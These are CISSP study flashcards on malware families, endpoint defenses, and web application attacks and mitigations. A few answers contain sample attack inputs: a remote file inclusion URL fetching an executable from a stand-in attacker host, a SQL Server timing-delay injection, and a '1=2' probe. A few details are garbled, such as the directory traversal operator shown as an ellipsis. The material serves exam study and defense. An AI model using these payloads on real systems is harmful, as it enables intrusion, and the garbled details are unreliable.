CISSP ch 21

Question 1

Virus functions

Answer 1

two main functions – propagation and payload execution

Question 2

MBR (virus)

Answer 2

master boot record virus

One of the earliest known forms of infection

Attack the MBR – the portion of bootable media (e.g., hard disk or flash drive) that the computer uses to load the operating system during the boot process

MBR is extremely small, usually 512 bytes, can’t contain all the code required to implement the virus’ propagation and destructive functions

To bypass space limitation, store the majority of their code on another portion of the storage media

When system reads the infected MBR, virus instructs it to read and execute the code stored in this alternate location

Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users

If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory, infects the MBR on the target’s system’s hard drive

Question 3

Master boot record

Answer 3

not the boot sector

MBR is a single disk sector, normally the first sector of the media that is read in the initial stages of the boot process. MBR then determines which media partition contains the operating system and then directs the system to read that partition’s boot sector to load the operating system. Viruses can attack both the MBR and the boot sector, with similar results

Question 4

File infector virus

Answer 4

Viruses that infect different types of executable files and trigger when the operating system attempts to execute them

Windows-based systems, viruses affect executable files and scripts:

.exe

.com

.msc

Standard file infector viruses that do not use cloaking techniques such as stealth or encryption are often easily detected by comparing file characteristics (size, modification date) before and after infection or by comparing hash values

Question 5

Companion virus

Answer 5

Variation of the file infector virus

Self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file

Rely on the default file name extensions that Windows-based operating systems append to commands when executive program files (in this order)

.com

.exe

.bat

E.g., replacing game.exe with game.com – if you open a command prompt and simply type GAME, the operating system would execute the virus file (game.com) instead of game.exe

Question 6

VBA

Answer 6

visual basic for applications = programming language used by scripting functionalities

Question 7

Macro viruses

Answer 7

Leverages scripting functionality implemented in common software applications

E.g., Melissa Virus in 1999 and I Love You Virus in 2000 spread through Word Document that exploited a vulnerability in Outlook to replicate

Question 8

Service injection virus

Answer 8

Inject themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe and explorer.exe

Bypasses detection by any antivirus software running on the host

Best protection: ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches

Question 9

Multipartite viruses

Answer 9

Use more than one propagation technique

E.g., virus might infect critical COM and EXE files by adding malicious code to each file (file infector virus), then write malicious code to the system’s master boot record (boot sector virus)

Question 10

stealth viruses

Answer 10

Hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally

E.g., overwriting the system’s master boot record but then modifying the operating system’s file access functionality to cover its tracks

Question 11

polymortphic viruses

Answer 11

Modify their own code as they travel from system to system

Propagation and destruction techniques remain the same, but the signature of the virus is somewhat different each time it infects a new system

Current versions of anti-virus software are able to detect known polymorphic viruses

Question 12

encrypted viruses

Answer 12

Use cryptographic techniques to avoid detection

In their outward appearance, quite similar to polymorphic viruses, each infected system has a virus with a different signature

However, do not generate these modified signatures by changing their code, instead they alter the way they are stored on the disk

Use a very short segment of code, known as the virus decryption routine, which contains the cryptographic information necessary to lead and decrypt the main virus code stored elsewhere on the disk. Each infection utilizes a different cryptographic key, causing the main code to appear completely different on each system.

However, the virus decryption routines often contain telltale signatures that render them vulnerable to updated antivirus software packages

Question 13

trojan horses

Answer 13

software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network

Question 14

RATs

Answer 14

Remote access Trojans = open backdoors in systems that grant the attacker remote administrative control of the infected systems

E.g., a RAT might open a Secure Shell (SSH) port on a system that allows the attacker to use a preconfigured account to access the system and then send a notice to the attacker that the system is ready and waiting for a connection

Question 15

cryptomalware

Answer 15

designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies

Question 16

worms

Answer 16

contain same destructive potential as other malicious code objects with an added twist – they propagate themselves without requiring any human intervention

Question 17

PUPs

Answer 17

potentially unwanted programs = software that a user might consent to installing on their system that then carries out functions that the user did not desire or authorize

Question 18

Scripting technology

Answer 18

automate input of commands = also available to improve the efficiency of malicious actors = commonly found in a class of malware known as fileless malware

Question 19

Fileless malware

Answer 19

never write files to disk, making them more difficult to detect = e.g., link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload

Question 20

Antivirus responses to detection

Answer 20

If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition

If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually

If security setting/policies do not provide for the quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity

Question 21

File integrity monitoring tools

Answer 21

secondary anti-virus functionality = designed to alert administrator to unauthorized file modifications = maintain a database of hash values for al files stored on the system, archived hash values are then compared to current computed values to detect any files that were modified between two periods

Question 22

EDR

Answer 22

endpoint detection and response packages = go beyond traditional antimalware protection to help protect endpoints against attack = contain antimalware capabilities found in traditional antirvirus packages with advanced techniques designed to better detect threats and take steps to eradicate them, some specific capabilities include:

Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity

Automatically isolating possible malicious activity to contain the potential damage

Integration with threat intelligence sources to obtain a real-time insight into malicious behavior elsewhere on the internet

Integration with other incident response mechanisms to automate response efforts

Question 23

MDR

Answer 23

managed detection and response services = where security vendors offer EDR capabilities and also provide installation, configuration, and monitoring services to reduce load on customer security teams

Question 24

UEBA

Answer 24

user and entity behavior analytics packages

pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise

UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint

Question 25

buffer overflow vulnerabilities

Answer 25

exist when a developer does not properly validate user input to ensure that is of an appropriate size, input that is too large can “overflow” a data structure to affect other data sored in the computer’s memory

can corrupt other data stored in memory or at worst, be used to overwrite system commands, allowing attacker to execute targeted commands on the server

Question 26

buffer overflow defenses

Answer 26

The user can’t enter a value longer than the size of any buffer that will hold it

The user can’t enter an invalid value for the variable types that will hold it

The user can’t enter a value that will cause the program to operate outside its specific parameters

Question 27

CGI

Answer 27

Common Gateway Interface = language that allows unskilled programmers to quickly create interactive web pages = buffer overflow vulnerabilities are especially prevalent in code developed rapidly for the web using this language and other similar languages

Question 28

TOC and TOU

Answer 28

TOC = time of check = time at which the subject checks on the status of the object, there may be several decisions to make before returning to the object to access it

TOU = time of use = when the decision is made to access the object

Question 29

TOCTTOU attacks / race conditiosn

Answer 29

when the difference between the TOC and the TOU is large enough for an attacker to replace the original object with another objects that suits their own needs, attacker is racing with the legitimate process to replace the object before it is used = example of a state attack (attack timing, data flow control and transition between on system state to another)

E.g., replacing a data file after its identity has been verified but before data is read

Question 30

rootkits

Answer 30

common way that attackers wage privilege escalation attacks = freely available on the internet and exploit known vulnerabilities in various operating systems = root is the administrator level

Question 31

injection vulnerabilities

Answer 31

allows an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute

Question 32

SQL injection attacks

Answer 32

attacker sends an unusual request to the web server, usually involving commands, including requests that execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases

Question 33

blind SQL injection

Answer 33

when some SQL injection flaws do not provide the attacker with a means to directly view the results of the attack

Question 34

blind content-based SQL injection attack

Answer 34

perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack

E.g. adding 1=2 and the end of the request to see if the web application is vulnerable (vulnerable if returns no results, means the web server looks past the end of the request)

If vulnerable, attacker can then attempt more malicious queries that alter the contents of the database or perform other unwanted actions

Question 35

blind timing-based SQL injection attacks

Answer 35

using the amount of time required to process a query as a channel for retrieving information from a database

Attacks depend on delay mechanisms provided by different database platforms. E.g., Microsoft SQL Server’s Transact-SQL allows a user to specify a command such as this:

WAITFOR DELAY ’00:00:15’

This would instruct the database to wait 15 seconds before performing the next action. An application that immediately returns the results is probably not vulnerable to timing-based attacks

Can be used to identify each character of a password, one by one, by instructing the database to wait a certain amount of time if the character is equal to the current letter

Tools like SQLmap and Metasploit automate blind timing-based attacks

Question 36

Code injection attacks

Answer 36

general class of attacks that include SQL injection attacks = seek to insert attacker-written code into the legitimate code created by a web application developer

Question 37

LDAP injection attack

Answer 37

ttackers embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query

focus of the attack is on the back end of an LDAP directory service rather than a database server

Question 38

XML injection

Answer 38

where the back-end target is an XML application

Commands may attempt to load dynamically linked libraries (DLL) containing malicious code in a DLL injection attack

Question 39

command injection attacks

Answer 39

where application code reaches back to the operating system to execute a command

an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system

E.g., adding an ampersand (&) to indicate that the operating system should execute the text after the ampersand as a separate command, allowing attacker to execute commands (e.g., rm command, used to remove something) by exploiting an input field that is only intended to execute a mkdir command (create new directory command)

Question 40

Authorization vulnerabilities

Answer 40

allow an attacker to exceed the level of access that they are authorized

Question 41

OWASP

Answer 41

Open Web Application Security Project = a nonprofit security project focused on improving security for online or web-based applications = maintains a top 10 list of the most critical web application security risks and the top 10 proactive controls to protect against application security issues

Question 42

Insecure direct object reference

Answer 42

if the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority by editing a query string or a POST request in the URL

Question 43

Directory traversal attacks

Answer 43

when web servers allow the inclusion of operators that navigate the directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server

E.g., In Linux operating systems, the … operator in the file path refers to the directory one level higher than the current directory. Directory traversal attacks use this knowledge and attempt to navigate outside of the areas of the filesystem that are reserved for the web server

Question 44

file inclusion attacks

Answer 44

directory traversal attacks taken to the next level = instead of simply retrieving a file and displaying it, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code

Question 45

local file inclusion attacks

Answer 45

seek to execute code stored in a file located elsewhere on the web server

E.g., a file that the attacker uploaded to a directory on a Windows server

Question 46

Remote file inclusion attacks

Answer 46

allow the attacker to execute code that is stored on a remote server

Attacker can directly control the code being executed without having to first store a file on the local server

E.g., http://www.mycompany.com/app.php?include=http://evil.attacker.com/attack.exe

Question 47

Web shells

Answer 47

allow the attacker to execute commands on the server and view the results in the browser = provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools, attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team

Question 48

XSS

Answer 48

cross-site scripting attacks = when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page

Question 49

Reflected XSS

Answer 49

when an application allows reflected input, e.g., adding a script into the ‘name’ field of a form to ‘reflect’ the input

Can be used to embed form input in a link. When a user visits the link, the web page is an authentic website, but executes the script included in the input by the malicious link creator

When creating web applications that allow any type of user input, developers must be sure to perform input validation. Applications should never allows a user to include the

 tag in a reflected input field

Question 50

Output encoding

Answer 50

set of techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form, e.g., HTML encoding transforms the single quote ‘ character into the encoded string '

specific techniques:

HTML entity encoding

HTML attribute encoding

URL encoding

JavaScript encoding

CSS hex encoding

Question 51

Stored/Persistent XSS

Answer 51

remain on the server even when the attacker isn’t actively waging an attack = e.g., a user inserts HTML script into a blog post to redirect users to a phishing site, request sensitive information or perform another attack

Question 52

DOM

Answer 52

Document Object Model environment within a user’s browser = can be modified by XSS attacks without appearing in the HTML code of the web page

Question 53

Request forgery attacks

Answer 53

exploit trust relationships and attempt to have users unwittingly execute commands against a remote server = come in two forms: CSRF / XSRF and SSRF

Question 54

CSRF / XSRF

Answer 54

Cross-site request forgery

Exploit the trust that remote sites have in a user’s system to execute commands on the user’s behalf

Makes the reasonable assumption that users are often logged into many different websites at the same time

Attackers then embed code in one website that sends a command to a second website

When the user clicks the link of the first site, they are unknowingly sending a command to the second site

To protect against XSRF attacks is to create web applications that use secure tokens that the attacker would not know to embed in links, and to check the referring URL in requests received from end users and only accept requests that originated from their own site

Question 55

SSRF

Answer 55

erver-side request forgery

Trick a server into visiting a URL based on user-supplied input

Possible when a web application accepts URLs from user as input and then retrieves information from that URL

If the server has access to non-public URLs, an SSRF attack can unintentionally disclose that information to an attacker

Question 56

Session hijacking attacks

Answer 56

when a malicious individual intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user = common techniques:

Capturing details of the authentication between a client and server and using those details to assume the client’s identity

Tricking the client into thinking the attacker’s system is the server, acting as the intermediary as the client sets up a legitimate connection with the server, and then disconnecting the client (man in the middle)

Accessing a web application using the cookie data of a user who did not properly close the connection or of a poorly designed application that does not properly manage authentication cookies

Question 57

Input whitelisting

Answer 57

allow listing

Developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers

Question 58

input blacklisting

Answer 58

block listing

Developers describe potentially malicious input that must be blocked, e.g., HTML tags or SQL commands in user input

Question 59

metacharacters

Answer 59

characters that have been assigned special programmatic meaning, e.g., single and double quotation marks, open/close square brackets, backslash, semicolon, ampersand, caret (^), dollar sign, period or dot, vertical bar, pipe symbol, question mark, asterisk, plus sign, open/close curly braces, and open/close parentheses

Question 60

parameter pollution

Answer 60

technique to defeat input validation

sends a web application more than one value for the same input variable

depends on defects in web platforms that don’t handle multiple copies of the same parameter properly

Question 60

escaping a metacharacter

Answer 60

process of marking the metacharacter as merely a normal or common character, such as a letter or number, thus removing its special programmatic powers

Often done by adding a backslash in front of the character

Question 61

WAFs

Answer 61

Web application firewalls

Function similarly to network firewalls, but they work at the application layer of the OSI model

In between DMZ and web server DMZ is behind network firewall, which protects internal network and DMZ/web server

Scrutinizes the input headed to the application, performing input validation before passing the input to the web server

Question 62

parameterized queries

Answer 62

protects against injection attacks = developer prepares an SQL statement and then allows user input to be passed into that statement as carefully defined variables that do not allow the insertion of code (fill in the blanks)

different programming languages have different functions to perform this task:

Java uses the PreparedStatement() function

PHP uses the bindParam() function

Question 63

stored procedures

Answer 63

similar to parameterized queries but the SQL code is not contained within the application but is stored on the database server, client does not directly send SQL code to the database server, instead client sends arguments to the server, which then inserts those arguments into a precompiled query template

Protects against injection attacks and also improves database performance

Question 64

tokenization

Answer 64

Replaces personal identifiers that might directly reveal an individual’s identity with a unique identifier using a lookup table

Must keep lookup table secure

Question 65

code signing

Answer 65

way for developers to confirm the authenticity of their code to end users

Use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer’s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals

Corresponding public key is included in a digital certificate that is distributed with the application

Does not guarantee that the code came from an authentic source and was not modified. If developer digitally signs malicious code, that code will pass the signature verification process

Question 66

SKDs

Answer 66

software development kits

collections of software libraries combined with documentation, examples and other resources designed to help programmers get up and running quickly in a development environment, often include specialized utilities designed to help developers design and test code

Question 67

code libraries

Answer 67

consist of shared code objects that perform related functions (e.g., biology research, financial analysis or social media)

Question 68

dead code

Answer 68

code is in use in an organization but nobody is responsible for the maintenance of that code and nobody may even know where the original source files reside

Question 69

code integrity measurement

Answer 69

uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved

Question 70

scalability

Answer 70

Applications should be designed so that computing resources they require may be incrementally added to support increasing demand

Question 71

vertical scaling

Answer 71

scaling up = adding more resources to an existing computing instance

Question 72

horizontal scaling

Answer 72

scaling out = adding additional instances to a pool

Question 73

elasticity

Answer 73

Applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when they are no longer needed (scale up and down)

Question 74

error handling

Answer 74

e.g., try…catch functionality, allows developers to explicitly specify how errors should be handled

overly verbose error handling routines may present a risk, do not explain too much about the inner workings of code (e.g., that database is running the MySQL database engine)

Question 75

hard-coded credentials

Answer 75

developers may include usernames and passwords in source code

Question 76

Resource exhaustion

Answer 76

systems consume all of the memory, storage, processing time or other resources available on the system, rendering it disabled or crippled for other uses

Question 77

memory leak

Answer 77

an application fails to return some memory that is no longer needs, perhaps by simply losing track of an object that is has written to reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all of the memory available to the system, causing it to crash = rebooting resets the problem, but cycle begins anew

Question 78

memory pointers

Answer 78

area of memory that stores an address of another location in memory

Question 79

pointer dereferencing

Answer 79

when an application follows the pointer and accesses the memory referenced by the pointer address

Question 80

NULL value

Answer 80

what is contained in an empty pointer

Question 81

NULL pointer exception

Answer 81

caused when the application tries to dereference a NULL pointer

best case: causes program to crash, providing attacker with access to debugging information

worst case: may allow an attacker to bypass security controls